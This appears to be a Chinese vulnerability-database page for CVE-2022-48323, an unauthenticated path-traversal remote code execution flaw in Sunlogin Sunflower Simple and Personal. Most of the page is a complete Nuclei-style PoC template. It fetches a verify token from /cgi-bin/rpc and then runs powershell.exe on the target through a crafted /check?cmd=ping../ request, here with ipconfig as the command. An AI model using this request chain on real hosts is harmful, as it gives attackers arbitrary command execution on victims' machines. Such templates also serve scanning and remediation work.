CVE-2022-48323: Sunflower Simple and Personal 1.0.1.43315 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Sunflower Simple and Personal | POC: 已公开

漏洞描述

Sunlogin Sunflower Simplified (aka Sunflower Simple and Personal) 1.0.1.43315 is vulnerable to a path traversal issue. A remote and unauthenticated attacker can execute arbitrary programs on the victim host by sending a crafted HTTP request, as demonstrated by /check?cmd=ping../ followed by the pathname of the powershell.exe program.

PoC代码[已公开]

id: CVE-2022-48323

info:
  name: Sunflower Simple and Personal 1.0.1.43315 - Remote Code Execution
  author: daffainfo
  severity: critical
  description: |
    Sunlogin Sunflower Simplified (aka Sunflower Simple and Personal) 1.0.1.43315 is vulnerable to a path traversal issue. A remote and unauthenticated attacker can execute arbitrary programs on the victim host by sending a crafted HTTP request, as demonstrated by /check?cmd=ping../ followed by the pathname of the powershell.exe program.
  reference:
    - https://www.1024sou.com/article/741374.html
    - https://copyfuture.com/blogs-details/202202192249158884
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
    - https://asec.ahnlab.com/en/47088/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-48323
    cwe-id: CWE-22
    epss-score: 0.91426
    epss-percentile: 0.99641
    cpe: cpe:2.3:a:sunlogin:sunflower:1.0.1.43315:*:*:*:simple:*:*:*
  metadata:
    max-request: 2
    vendor: sunlogin
    product: sunflower
  tags: cve,cve2022,sunflower,rce,vkev,vuln

http:
  - raw:
      - |
        POST /cgi-bin/rpc HTTP/1.1
        Host: {{Hostname}}

        action=verify-haras

      - |
        GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
        Host: {{Hostname}}
        Cookie: CID={{cid}}

    extractors:
      - type: regex
        name: cid
        internal: true
        group: 1
        regex:
          - '"verify_string":"(.*?)"'
    matchers:
      - type: dsl
        dsl:
          - "status_code_1==200"
          - "status_code_2==200"
          - "contains(body_1, 'verify_string')"
          - "contains(body_2, 'Windows IP')"
        condition: and
# digest: 490a00463044022060e0044a47173527927ddea817089f3820dfcfdc1f1d8eecc2363ecfb97207770220291f463fad994b83b2f32106b0485fef66a787aaf032b50fbae3264ec952bf46:922c64590222798bb761d5b6d8e72950

相关漏洞推荐